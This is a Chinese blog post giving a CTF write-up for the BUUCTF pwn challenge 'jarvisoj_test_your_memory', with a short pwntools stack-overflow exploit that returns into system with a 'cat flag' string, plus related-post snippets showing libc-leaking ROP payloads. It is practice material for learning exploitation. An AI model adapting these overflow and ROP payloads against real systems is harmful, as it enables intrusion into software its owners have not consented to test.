[BUUCTF-pwn]——jarvisoj_test_your_memory

最新推荐文章于 2023-05-18 10:27:46 发布

Y-peak

最新推荐文章于 2023-05-18 10:27:46 发布

阅读量266

点赞数

分类专栏： # BUUCTF

本文链接：https://blog.youkuaiyun.com/Y_peak/article/details/114891051

版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

[BUUCTF-pwn]——jarvisoj_test_your_memory

直接通过提示栈溢出

exploit

from pwn import*
p=remote('node3.buuoj.cn',"29320")
context.log_level = 'debug'
payload='a' * (0x13 + 4)+p32(0x8048440)+p32(0x8048677)+p32(0x80487E0)
							#system      main             cat flag
p.sendline(payload)

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF---jarvisoj_level4

qq_33010875的博客

09-26

340

环境：WSL2，ubuntu16.04，python2 checksec文件: 将文件拖入ida 溢出点：和level3不同的是 read函数之前没有调用write函数，因此要泄露libc的基地址需要用read函数，利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1097

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

参与评论您还未登录，请先登录后发表或查看评论

[BUUCTF]PWN——jarvisoj_test_your_memory

mcmuyanga的博客

11-06

652

jarvisoj_test_your_memory 附件步骤：例行检查，32位程序，开启了nx保护试运行一下程序，看看大概的情况 32

buuctf jarvisoj_test_your_memory

carol2358的博客

05-06

369

运行可以看到泄露了cat flag的data的位置，在程序里可以看到system，栈溢出就行了 exp： from pwn import * from LibcSearcher import * local_file = './memory' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2...

BUUCTF pwn——jarvisoj_test_your_memory

CNS-Enterprise BCC-1701-J

05-18

184

BUUCTF 做题练习

BUUCTF Misc Page2-6部分题目

热门推荐

cuihua的博客

07-15

8万+

BUUCTF Misc Page2-6部分题目

BUUCTF PWN OGeek2019 babyrop

Rt1Text的博客

05-01

424

1.checksec+运行 32位/ NX保护开启/ 还有Full RELRO 2.IDA进行中

持续更新 BUUCTF——PWN（一）

weixin_41748164的博客

08-13

1356

buuctf pwn

PWN-PRACTICE-BUUCTF-10

P1umH0的博客

08-08

132

PWN-PRACTICE-BUUCTF-10jarvisoj_level3_x64bjdctf_2020_babyrop2hitcontraining_uafjarvisoj_test_your_memory jarvisoj_level3_x64 64位elf的栈溢出，ret2csu from pwn import * #context.log_level='debug' #io=process('./jarvisoj_level3_x64') io=remote('node4.buuoj.cn',294

BUUCTF----jarvisoj_level3_x64

qq_33010875的博客

09-26

558

环境：WSL2，ubuntu16.04，python2 checksec文件：这道题level3的思路一样，只是32位的程序改成了64位。也就是说，在利用write函数泄露出libc的基地址时，需要用到寄存器来穿参数，write有三个参数，所以需要rdi，rsi，rdx三个寄存器，通过命令： ROPgadget --binary level3_x64 |grep "pop" 结果：从图中可以看到只找到了rdi和rsi寄存器，没有rdx寄存器尝试gdb程序：在read函数下断点，可以看到rd

BUUCTF-Pwn-get_started_3dsctf_2016

餐桌上的猫

03-04

248

题目截图

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

762

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

4964

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

[BUUCTF-pwn]——ciscn_2019_n_3

Y_peak的博客

11-20

3202

[BUUCTF-pwn]——ciscn_2019_n_3 结构体： //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

2590

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

[BUUCTF-pwn]——jarvisoj_level0

Y_peak的博客

01-31

2334

[BUUCTF-pwn]——jarvisoj_level0 题目地址：https://buuoj.cn/challenges#jarvisoj_level0 题目：还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。 64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆

[BUUCTF-pwn]——others_shellcode

Y_peak的博客

02-12

1590

[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存

[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)

Y_peak的博客

02-16

1539

[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。栈劫持 or 栈迁移栈劫持也可以称为栈迁移，用来解决栈本身可以利用的空间不够用，一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式，利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop

[BUUCTF-pwn]——wdb2018_guess (environ环境变量)

Y_peak的博客

04-06

1466

[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路思路来了利用主动触发canary保护, 调用**

buuctf-pwn入门